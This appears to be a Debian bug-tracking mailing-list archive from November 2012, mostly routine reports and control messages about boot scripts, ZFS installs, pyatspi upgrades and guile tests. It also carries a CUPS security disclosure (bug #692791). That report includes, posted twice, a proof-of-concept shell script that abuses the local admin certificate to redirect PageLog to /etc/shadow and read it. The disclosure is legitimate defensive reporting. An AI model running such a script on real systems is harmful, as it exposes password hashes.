+Signed-off-by: Rajiv Andrade sra...@linux.vnet.ibm.com
+---
+ src/include/rpc_tcstp.h |2 +-
+ src/include/rpc_tcstp_tcs.h |4 ++--
+ src/include/tcs_tsp.h   |5 +
+ src/include/tcs_utils.h |5 -
+ src/tcs/rpc/tcstp/rpc.c |   15 ++-
+ src/tcs/tcs_pbg.c   |9 +
+ src/tcs/tcs_utils.c |4 ++--
+ src/tcsd/tcsd_threads.c |2 +-
+ src/tspi/rpc/tcstp/rpc.c|   12 ++--
+ 9 files changed, 36 insertions(+), 22 deletions(-)
+
+diff --git a/src/include/rpc_tcstp.h b/src/include/rpc_tcstp.h
+index ed79911..50859e2 100644
+--- a/src/include/rpc_tcstp.h
 b/src/include/rpc_tcstp.h
+@@ -31,7 +31,7 @@ struct tcsd_packet_hdr {
+ 
+ struct tcsd_comm_data {
+ 	BYTE *buf;
+-	int buf_size;
++	UINT32 buf_size;
+ 	struct tcsd_packet_hdr hdr;
+ } STRUCTURE_PACKING_ATTRIBUTE;
+ 
+diff --git a/src/include/rpc_tcstp_tcs.h b/src/include/rpc_tcstp_tcs.h
+index 9f32814..57eab27 100644
+--- a/src/include/rpc_tcstp_tcs.h
 b/src/include/rpc_tcstp_tcs.h
+@@ -392,8 +392,8 @@ void LoadBlob_LOADKEY_INFO(UINT64 *, BYTE *, TCS_LOADKEY_INFO *);
+ void UnloadBlob_LOADKEY_INFO(UINT64 *, BYTE *, TCS_LOADKEY_INFO *);
+ void LoadBlob_PCR_EVENT(UINT64 *, BYTE *, TSS_PCR_EVENT *);
+ TSS_RESULT UnloadBlob_PCR_EVENT(UINT64 *, BYTE *, TSS_PCR_EVENT *);
+-int setData(TCSD_PACKET_TYPE, int, void *, int, struct tcsd_comm_data *);
+-UINT32 getData(TCSD_PACKET_TYPE, int, void *, int, struct tcsd_comm_data *);
++int setData(TCSD_PACKET_TYPE, unsigned int, void *, int, struct tcsd_comm_data *);
++UINT32 getData(TCSD_PACKET_TYPE, unsigned int, void *, int, struct tcsd_comm_data *);
+ void initData(struct tcsd_comm_data *, int);
+ int recv_from_socket(int, void *, int);
+ int send_to_socket(int, void *, int);
+diff --git a/src/include/tcs_tsp.h b/src/include/tcs_tsp.h
+index bba3258..fdca21e 100644
+--- a/src/include/tcs_tsp.h
 b/src/include/tcs_tsp.h
+@@ -90,4 +90,9 @@ struct key_disk_cache
+ /* needed by execute transport in the TSP */
+ #define TSS_TPM_TXBLOB_HDR_LEN		(sizeof(UINT16) + (2 * sizeof(UINT32)))
+ 
++#define TSS_TPM_TXBLOB_SIZE		(4096)
++#define TSS_TXBLOB_WRAPPEDCMD_OFFSET	(TSS_TPM_TXBLOB_HDR_LEN + sizeof(UINT32))
++#define TSS_MAX_AUTHS_CAP		(1024)
++#define TSS_REQ_MGR_MAX_RETRIES		(5)
++
+ #endif
+diff --git a/src/include/tcs_utils.h b/src/include/tcs_utils.h
+index 71cf3f7..0f0f4ce 100644
+--- a/src/include/tcs_utils.h
 b/src/include/tcs_utils.h
+@@ -92,11 +92,6 @@ TSS_RESULT owner_evict_init();
+ #define EVENT_LOG_final()
+ #endif
+ 
+-#define TSS_TPM_TXBLOB_SIZE		(4096)
+-#define TSS_TXBLOB_WRAPPEDCMD_OFFSET	(TSS_TPM_TXBLOB_HDR_LEN + sizeof(UINT32))
+-#define TSS_MAX_AUTHS_CAP		(1024)
+-#define TSS_REQ_MGR_MAX_RETRIES		(5)
+-
+ #define next( x ) x = x-next
+ 
+ TSS_RESULT key_mgr_dec_ref_count(TCS_KEY_HANDLE);
+diff --git a/src/tcs/rpc/tcstp/rpc.c b/src/tcs/rpc/tcstp/rpc.c
+index ca1a4df..849f652 100644
+--- a/src/tcs/rpc/tcstp/rpc.c
 b/src/tcs/rpc/tcstp/rpc.c
+@@ -181,7 +181,7 

Bug#677097: mountall-bootclean.sh nukes udev's data in /run

2012-11-08 Thread Roger Leigh
On Thu, Nov 08, 2012 at 12:44:09PM +0100, Jakub Wilk wrote:
 * Roger Leigh rle...@codelibre.net, 2012-11-08, 00:22:
 
 Would it be possible to debug this in a bit more detail on your
 system? /lib/init/bootclean.sh's clean function must be failing
 all these checks:
 
 Thu Nov  8 12:17:30 2012: Cleaning up temporary files
 Thu Nov  8 12:17:30 2012: BEFORE BOOTMISC: [ .tmpfs dhclient.eth0.pid initctl 
 initramfs lock mount network sendsigs.omit.d shm udev utmp ]
 Thu Nov  8 12:17:30 2012: AFTER BOOTMISC: [ dhclient.eth0.pid initctl 
 initramfs lock mount network sendsigs.omit.d shm udev utmp ]
 Thu Nov  8 12:17:31 2012: Setting up X socket directories... /tmp/.X11-unix 
 /tmp/.ICE-unix.
 Thu Nov  8 12:17:31 2012: BEFORE MOUNTALL-BOOTCLEAN: [ dhclient.eth0.pid 
 initctl initramfs lock mount network sendsigs.omit.d shm udev utmp ]
 Thu Nov  8 12:17:31 2012: Cleaning up temporary files... /tmp /lib/init/rw 
 /run /run/lock /run/shm.
 Thu Nov  8 12:17:31 2012: AFTER MOUNTALL-BOOTCLEAN: [ .clean initramfs lock 
 mount network sendsigs.omit.d shm udev utmp ]
 Thu Nov  8 12:17:31 2012: INIT: Entering runlevel: 2
 
 (This is on a VM on which I had to impose a sleep to make the bug
 trigger. However, the bug also triggers naturally on my development
 machine, which I can't reboot right know, though I'm pretty sure the
 cause is the same there.)
 
 As I understand it, bootmisc is supposed to be run _after_
 mountall-bootclean, though this order doesn't seem to be enforced in
 any way.

So it's looking like we may be just missing a dependency here, so the
bug would be present all the time, but the parallelism is exposing it
more frequently.

Would be worth checking the /etc/init.d/depend files and running
/usr/share/insserv/make-testsuite to see exactly where bootmisc is
being placed in the depdendency graph.  The intention is that this
won't run until after mountall-bootclean.  I /think/ that the
$remote_fs is supposed to ensure this, but this might not be good
enough.  Maybe we need to add mountall_bootclean to $local_fs, or
add X-Start-Before: bootmish.sh to mountall_bootclean.

Could you possible try both of those, rerun insserv, and see if this
prevents the problem from occuring?


Thanks again,
Roger

-- 
  .''`.  Roger Leigh
 : :' :  Debian GNU/Linuxhttp://people.debian.org/~rleigh/
 `. `'   schroot and sbuild  http://alioth.debian.org/projects/buildd-tools
   `-GPG Public Key  F33D 281D 470A B443 6756 147C 07B3 C8BC 4083 E800


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#692791: members of lpadmin can read every file on server via cups

2012-11-08 Thread Jörg Ludwig
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible 
to access the cups web interface as admin. You can edit the cups config file 
and set the page log to any filename you want (for example /etc/shadow). Then 
you can read the file contents by viewing the cups page log. By printing you 
can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal webbrowser I 
created a simple shell script to show the effect. When called as any 
unprivileged user which is member of lpadmin it should display the contents of 
/etc/shadow:


#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH=Authorization: Local $(cat /var/run/cups/certs/0)

POST -d -H $AUTH -H Cookie: org.cups.sid=
http://localhost:631/admin/ EOF
OP=config-serverorg.cups.sid=SAVECHANGES=1CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages cups depends on:
ii  adduser 3.112+nmu2   add and remove users and groups
ii  bc  1.06.95-2The GNU bc arbitrary precision cal
ii  cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  cups-ppdc   1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii  ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii  libavahi-client30.6.27-2+squeeze1Avahi client library
ii  libavahi-common30.6.27-2+squeeze1Avahi common library
ii  libc6   2.11.3-4 Embedded GNU C Library: Shared lib
ii  libcups21.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libcupsdriver1  1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libcupsimage2   1.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libcupsmime11.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libcupsppdc11.4.4-7+squeeze1 Common UNIX Printing System(tm) - 
ii  libdbus-1-3 1.2.24-4+squeeze1simple interprocess messaging syst
ii  libgcc1 1:4.4.5-8GCC support library
ii  libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii  libgssapi-krb5-21.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii  libijs-0.35 0.35-7   IJS raster image transport protoco
ii  libkrb5-3   1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii  libldap-2.4-2   2.4.23-7.2   OpenLDAP libraries
ii  libpam0g1.1.1-6.1+squeeze1   Pluggable Authentication Modules l
ii  libpaper1   1.1.24   library for handling paper charact
ii  libpoppler5 0.12.4-1.2   PDF rendering library
ii  libslp1 1.2.1-7.8OpenSLP libraries
ii  libstdc++6  4.4.5-8  The GNU Standard C++ Library v3
ii  libusb-0.1-42:0.1.12-16  userspace USB programming library
ii  lsb-base3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii  poppler-utils   0.12.4-1.2   PDF utilitites (based on libpopple
ii  procps  1:3.2.8-9squeeze1/proc file system utilities
ii  ssl-cert1.0.28   simple debconf wrapper for OpenSSL
ii  ttf-freefont20090104-7   Freefont Serif, Sans and Mono True
ii  zlib1g  1:1.2.3.4.dfsg-3 compression library - runtime

Versions of packages cups recommends:
ii  cups-driver-gutenprint  5.2.6-1  printer drivers for CUPS
ii  foomatic-filters4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii  ghostscript-cups8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF

Versions of packages cups suggests:
ii  cups-bsd   1.4.4-7+squeeze1  Common UNIX Printing System(tm) - 
pn  cups-pdf   none(no description available)
ii  foomatic-db20100630-1OpenPrinting printer support - dat
pn  hplip  none(no description available)
ii  smbclient  2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for 
ii  udev   164-3 /dev/ and hotplug management daemo
pn  xpdf-korean | xpdf-jap none(no description available)

-- 

Bug#692523: marked as done (cm-super: changelog.Debian.gz could be for wrong version)

2012-11-08 Thread Debian Bug Tracking System
Your message dated Thu, 08 Nov 2012 23:32:34 +
with message-id e1twbam-0005kt...@franck.debian.org
and subject line Bug#692523: fixed in cm-super 0.3.4-7
has caused the Debian Bug report #692523,
regarding cm-super: changelog.Debian.gz could be for wrong version
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
692523: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692523
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: cm-super
Version: 0.3.4-6
Severity: serious

Dear Maintainer,

Since this package's doc dir is just a symlink to the one for
cm-super-minimal, the changelog.Debian.gz file comes from that package.
However, this package doesn't depend on an identical version of that
package, so it could be the wrong version.  Under the usual
interpretation of policy, this violates the directive that binary
packages MUST install a copy of debian/changelog (see section 12.7),
since a different version of the package would certainly have a
non-identical changelog.


-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 3.2.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages cm-super depends on:
ii  cm-super-minimal   0.3.4-6
ii  dpkg   1.16.9
ii  pfb2t1c2pfb0.3-9
ii  tex-common 3.13
ii  texlive-latex-recommended  2012.20120611-5

cm-super recommends no packages.

cm-super suggests no packages.

-- no debconf information

-- 
Hi! I'm a .signature virus! Copy me into your ~/.signature to help me spread!
---End Message---
---BeginMessage---
Source: cm-super
Source-Version: 0.3.4-7

We believe that the bug you reported is fixed in the latest version of
cm-super, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Norbert Preining prein...@debian.org (supplier of updated cm-super package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 07 Nov 2012 13:53:27 +0900
Source: cm-super
Binary: cm-super-minimal cm-super cm-super-x11
Architecture: source all
Version: 0.3.4-7
Distribution: unstable
Urgency: low
Maintainer: Debian TeX maintainers debian-tex-ma...@lists.debian.org
Changed-By: Norbert Preining prein...@debian.org
Description: 
 cm-super   - TeX font package (full version) with CM (EC) in Type1 in T1, T2*,
 cm-super-minimal - TeX font package (minimal version) with CM/EC in Type1 in 
T1, T2*
 cm-super-x11 - Make the cm-super fonts available to X11
Closes: 692523
Changes: 
 cm-super (0.3.4-7) unstable; urgency=low
 .
   * make sure that the correct changelog.Debian is installed by
 depending on the exact version of the source package (Closes: #692523)
Checksums-Sha1: 
 9af174efe2bd251084de0de183d13593e2cda845 1356 cm-super_0.3.4-7.dsc
 8ffdec5901c7f692d2811b604d467b8b658a0a45 12955 cm-super_0.3.4-7.diff.gz
 ea48f7837444cda9d4ad3f2b42fb51ae248a23f2 5834064 
cm-super-minimal_0.3.4-7_all.deb
 a886bdcd285f6a42dae6f6e696af5ba6c4e163ff 25633514 cm-super_0.3.4-7_all.deb
 9d768d1445c51f6d81f7af965302bb949fcd 793798 cm-super-x11_0.3.4-7_all.deb
Checksums-Sha256: 
 7c52426be3f25f0ef04c42662a2bd2cf48c97cae75e9c13d4f7368b2f3f28785 1356 
cm-super_0.3.4-7.dsc
 6c349d8334280fcb21572567c3683bb556c97f07cd03e163a21a7688474fdbd0 12955 
cm-super_0.3.4-7.diff.gz
 ca3c59613d68797049d41219ad82781e1619b73c3d40ac43f48f31b31acec6f6 5834064 
cm-super-minimal_0.3.4-7_all.deb
 daa097021d6d57efcc9e703e41776aa08027a91bb1710aef2334946d261a4f71 25633514 
cm-super_0.3.4-7_all.deb
 52f2a06c221868e9d1314865a160e0dfcb796b8f2e320d0f8f786e25e41dac4f 793798 
cm-super-x11_0.3.4-7_all.deb
Files: 
 586581b8f8262dce8f8d2bd836f69d96 1356 fonts optional cm-super_0.3.4-7.dsc
 d4b59f2f265021ede827858ac34c136c 12955 fonts optional cm-super_0.3.4-7.diff.gz
 669383591e5ad631d744d5fdee332c82 5834064 fonts optional 
cm-super-minimal_0.3.4-7_all.deb
 971aca4bafbf380c07a79f469d11e17a 25633514 fonts optional 

Bug#692791: members of lpadmin can read every file on server via cups

2012-11-08 Thread Jörg Ludwig
A line break got inserted into the script while posting. Here is the 
correct one.


--
Mit freundlichen Grüßen,

Jörg Ludwig

IServ GmbH
Rebenring 33
38106 Braunschweig

Telefon: 0531-3804450
Fax: 0531-4287745
Mobil:   0179-9101055
E-Mail:  joerg.lud...@iserv.eu
Internet:www.iserv.eu
USt.-IdNr.:  DE265149425
#!/bin/sh
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

AUTH=Authorization: Local $(cat /var/run/cups/certs/0)

POST -d -H $AUTH -H Cookie: org.cups.sid= http://localhost:631/admin/ EOF
OP=config-serverorg.cups.sid=SAVECHANGES=1CUPSDCONF=Listen 
localhost:631%0APageLog /etc/shadow
EOF

GET http://localhost:631/admin/log/page_log



Bug#651720: new ZFS installs completely broken in Wheezy/Sid

2012-11-08 Thread Arno Töll
unarchive 651720
reopen 651720
tags 651720 d-i
User: debian-...@lists.debian.org
Usertags: kfreebsd zfs
thanks

Running the most recent Wheezy d-i installer on kfreebsd fails, when
/boot is configured as a separate UFS partition, and / is on ZFS. The
installation fails with:

Nov  9 00:07:55 grub-installer: info: Installing grub on '/dev/ada0'
Nov  9 00:07:55 grub-installer: info: grub-install supports --no-floppy
Nov  9 00:07:55 grub-installer: info: Running chroot /target
grub-install  --no-floppy --force /dev/ada0
Nov  9 00:07:56 grub-installer: Installation finished. No error reported.
Nov  9 00:07:56 grub-installer: info: grub-install ran successfully
Nov  9 00:07:56 /bin/in-target: warning: /target/etc/mtab won't be
updated since it is a symlink.
Nov  9 00:07:59 grub-installer: error: Running 'update-grub' failed.
Nov  9 00:08:56 main-menu[106]: (process:33085): Error:
Nov  9 00:08:56 main-menu[106]: (process:33085): Could not stat device
/dev/disc - No such file or directory.
Nov  9 00:08:56 main-menu[106]: (process:33085): Warning:
Nov  9 00:08:56 main-menu[106]: (process:33085): Could not get identity
of device /dev/ada0 - Inappropriate ioctl for device
Nov  9 00:08:56 main-menu[106]: WARNING **: Configuring 'grub-installer'
failed with error code 1
Nov  9 00:08:56 main-menu[106]: WARNING **: Menu item 'grub-installer'
failed.

If I chroot into /target at this stage, and run update-grub manually,
I get:

Generating grub.cfg ...
Found kernel of FreeBSD: /boot/kfreebsd-9.0-2-amd64.gz
Found kernel module directory: /lib/modules/9.0-2-amd64
ls: cannot access /boot/zfs/zpool.cache: No such file or directory

Creating the zpool.cache file manually (local is my ZFS pool) in a
chroot to /target with

zpool set cachefile=/boot/zfs/zpool.cache local

both, update-grub called manually within the /target chroot, and from
the d-i menu it runs through. The resulting system boots correctly then.

Note: This issues does *NOT* happen when /boot is no separate partition,
but a ZFS volume as well.


-- 
with kind regards,
Arno Töll
IRC: daemonkeeper on Freenode/OFTC
GnuPG Key-ID: 0x9D80F36D



signature.asc
Description: OpenPGP digital signature


Bug#692631: non-free files in upstream tarball (The Software shall be used for Good, not Evil)

2012-11-08 Thread Javier Fernández-Sanguino Peña
merge 692071 692631
thanks

On Wed, Nov 07, 2012 at 11:20:33PM +0100, Ansgar Burchardt wrote:
 The upstream tarball contains files under the non-free JSON license:

This has already been reported. I'm merging this bug.

Regards

Javier


signature.asc
Description: Digital signature


Processed (with 1 errors): Re: Bug#692631: non-free files in upstream tarball (The Software shall be used for Good, not Evil)

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 merge 692071 692631
Bug #692071 [storymaps] storymaps: includes non-free files (src/org/json/*)
Unable to merge bugs because:
package of #692631 is 'src:storymaps' not 'storymaps'
Failed to merge 692071: Did not alter merged bugs
Debbugs::Control::set_merged('transcript', 'GLOB(0x3155eb0)', 
'requester', 'Javier Fernández-Sanguino Peña j...@computer.org', 
'request_addr', 'cont...@bugs.debian.org', 'request_msgid', 
'20121109002825.gc29...@javifsp.no-ip.org', 'request_subject', ...) called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 537
eval {...} called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 536
Debbugs::Control::Service::control_line('line', undef, 'clonebugs', 
'HASH(0x30c6bf8)', 'limit', 'HASH(0x30c65e0)', 'common_control_options', 
'ARRAY(0x30c6628)', 'errors', ...) called at /usr/lib/debbugs/service line 474

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
692071: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692071
692631: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692631
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 3 errors): new ZFS installs completely broken in Wheezy/Sid

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 unarchive 651720
 reopen 651720
Bug #651720 {Done: Robert Millan r...@debian.org} [partman-zfs] new ZFS 
installs completely broken in Wheezy/Sid
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions partman-zfs/16.
 tags 651720 d-i
Bug #651720 [partman-zfs] new ZFS installs completely broken in Wheezy/Sid
Added tag(s) d-i.
 User: debian-...@lists.debian.org
Unknown command or malformed arguments to command.
 Usertags: kfreebsd zfs
Unknown command or malformed arguments to command.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
651720: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=651720
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691160: Fixing pyatspi upgrades from squeeze

2012-11-08 Thread Samuel Thibault
Josselin Mouette, le Thu 01 Nov 2012 16:34:17 +0100, a écrit :
 B: 
  1. Remove python-pyatspi from the at-spi source package. 
  2. Rename python-pyatspi2 to python-pyatspi. 
  3. Make python-pyatspi2 an empty package depending on
 python-pyatspi.

I'd rather do this.

Samuel


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691160: Fixing pyatspi upgrades from squeeze

2012-11-08 Thread Samuel Thibault
Josselin Mouette, le Wed 07 Nov 2012 17:05:29 +0100, a écrit :
 Can someone pick the pyatspi2 part, or should I just pick an option and
 NMU pyatspi2?

I won't have much free time during the coming week to be able to do the
pyatspi2 part.  I guess the simplest way is that you NMU.

Samuel


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 692776 is serious, forcibly merging 691160 692776

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 692776 serious
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Bug #691160 [python-pyatspi2] broken upgrade path from python-pyatspi to 
python-pyatspi2
Ignoring request to change severity of Bug 692776 to the same value.
Ignoring request to change severity of Bug 691160 to the same value.
 forcemerge 691160 692776
Bug #691160 [python-pyatspi2] broken upgrade path from python-pyatspi to 
python-pyatspi2
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Bug #692776 [python-pyatspi2] python-pyatspi2: Error during apt-get 
dist-upgrade (wheezy-sid): Could not perform immediate configuration on 
'python-pyatspi2'
Merged 691160 692776
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691160: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691160
692776: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692776
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Daniel Hartwig
Control: tags -1 + patch

On 9 November 2012 04:15, Ludovic Courtès l...@gnu.org wrote:
 Your analysis makes perfect sense to me.

Thanks.


 commit e13f1cbdffa4f333d9866d1b22cd2c9a3b17b3bd
 Author: Ludovic Courtes ludovic.cour...@laas.fr
 Date:   Sun Jun 25 22:43:20 2006 +

 Fixed `guardians.test' so that it does not use symbols.

 In the context of 1.6/1.8, I’d first install the above patch and see
 whether it improves things.

This did not help, the tests still failed.

 Then, if that’s not enough, you may indeed relax the tests to (throw
 'unresolved).  But make sure to do manual testing of guardians before
 you do.

On a linux-i386 machine that experiences the test failures, I have
manually confirmed that guardians do indeed work as documented:

$ ./pre-inst-guile --version | head -n1
Guile 1.6.8
$ ./pre-inst-guile
guile (define g2 (make-guardian))
guile (g2 (list (string-copy g2-garbage)))
guile (define g3 (make-guardian))
guile (g3 (list (string-copy g3-garbage)))
guile (g3 g2)
guile (set! g2 #f)
guile (gc)
guile (define saved #f)
guile (do ((i 1 (1+ i)))
   (( i 100)
(set! saved (g3)))
 (apply + (iota 10)))
guile saved
(g3-garbage)
guile (set! saved #f)
guile (do ((i 1 (1+ i)))
   (( i 100)
(set! saved (g3)))
 (apply + (iota 10)))
guile saved
#greedy guardian 0x90f36f0 (reachable: 0 unreachable: 1)
guile (saved)
(g2-garbage)
guile (saved)
#f

which covers the same area as the failing tests.  The patch to relax
the tests makes the test-suite pass, and is ok for inclusion.

Andreas, I am not a DM, will you take care of this again?

Regards


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#689687: guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite failures

2012-11-08 Thread Debian Bug Tracking System
Processing control commands:

 tags -1 + patch
Bug #689687 [src:guile-1.6] guile-1.6: FTBFS on i386, kfreebsd-i386: testsuite 
failures
Added tag(s) patch.

-- 
689687: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689687
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684852: python-greenlet: diff for NMU version 0.3.1-2.1

2012-11-08 Thread Jelmer Vernooij
On Sun, 2012-11-04 at 19:00 +0100, gregor herrmann wrote:
 On Sat, 27 Oct 2012 21:46:37 +0100, Adam D. Barratt wrote:
 
I've uploaded Laszlo's NMU for python-greenlet (versioned as
0.3.1-2.1) and uploaded it to DELAYED/5. Please feel free to tell me
if I should delay it longer.
   That's the last entry in the bug log, but I don't see a -2.1 package
   in the PTS -- just curious what happened :)
  http://packages.qa.debian.org/p/python-greenlet/news/20121015T104745Z.html
  is the top entry on the package's PTS page from here.
 
 Right; I swear it wasn't when I sent the original mail :)
 
 Jelmer, does this mean the bug should be closes with 0.3.1-2.1?
python-eventlet should probably be updated to depend on the newer
version of python-greenlet (which hasn't yet migrated to wheezy AFAIK).

It would also be nice to make some of the changes that Jakub suggested
in http://lists.debian.org/debian-python/2012/02/msg00023.html, making
sure python-eventlet doesn't accidentally download from the internet.

Cheers,

Jelmer


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: fixed 640577 in 0.3.1-2.1

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 640577 0.3.1-2.1
Bug #640577 [python-greenlet] python-greenlet: missing .egg-info
Marked as fixed in versions python-greenlet/0.3.1-2.1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
640577: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640577
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: fixed 640577 in 0.3.1-2.1

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 640577 0.3.1-2.1
Bug #640577 [python-greenlet] python-greenlet: missing .egg-info
Ignoring request to alter fixed versions of bug #640577 to the same values 
previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
640577: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640577
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: fixed 691074 in 5:4

2012-11-08 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 691074 5:4
Bug #691074 [gcc-doc] gcc-doc: Depends on docs for wrong gcc version
Marked as fixed in versions gcc-doc-defaults/5:4.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
691074: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691074
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#685726: linux-image-3.2.0-3-amd64: return error when trying

2012-11-08 Thread Ben Hutchings
On Wed, 2012-11-07 at 16:50 +0400, hr...@infotech.am wrote:
 The problem solved in Debian Wheezy for kernel
 
 linux-image-3.2.0-4-amd64 3.2.32-1 amd64 Linux 3.2 for 64-bit PCs

Are you sure?  This doesn't include any of the changes that were
expected to fix this bug, as you did not report that you had tested
them.  It does have other bug fixes for ext4, though.

Ben.

-- 
Ben Hutchings
The program is absolutely right; therefore, the computer must be wrong.


signature.asc
Description: This is a digitally signed message part


Bug#692801: espeak-gui: Fails to run with ImportError: No module named xdg

2012-11-08 Thread Nelson A. de Oliveira
Package: espeak-gui
Version: 0.4-2
Severity: grave
Justification: renders package unusable

Hi!

Right after installing espeak-gui and trying to run it:

=
$ espeak-gui
